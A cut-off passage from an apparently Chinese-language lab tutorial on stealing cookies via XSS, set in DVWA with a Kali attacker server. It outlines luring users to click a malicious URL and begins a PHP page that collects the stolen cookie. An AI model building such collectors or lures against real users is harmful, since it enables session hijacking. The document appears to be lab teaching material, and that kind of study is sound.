思路:
- 搭建能接收cookie的服務器
- 構建帶有XSS惡意代碼的url
- 發給用戶誘導用戶點擊url
- 獲得用戶cookie並利用
實驗環境:
kali————充當攻擊者接收cookie的服務器 192.168.0.53
DVWA————充當客戶要訪問的目標網站
centos7————充當用戶客戶端
小試牛刀:
一、搭建服務器
1. kali開啓Apache服務
systemctl start apache2
2. 創建接收cookie的php頁面
2.1 在/var/www/html下創建能接收cookie的php頁面vim test.php
內容如下
<?php
$cookie = $_GET['cookie']; //獲取cookie值
file